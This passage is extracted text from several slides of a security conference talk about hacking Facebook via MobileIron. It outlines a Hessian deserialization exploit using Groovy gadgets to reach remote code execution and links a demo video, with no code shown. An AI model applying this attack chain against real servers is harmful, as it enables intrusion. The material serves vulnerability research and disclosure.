![Page 71: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/71.jpg)
Exploit with New Gadget
1. Hessian Deserialization
triggers:• Local Groovy gadgets
• Boom! RCE!
Hacker MobileIron
1
Payload
![Page 72: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/72.jpg)
Demohttps://youtu.be/hGTLIIOb14A
![Page 73: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/73.jpg)
漏洞回報
![Page 74: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/74.jpg)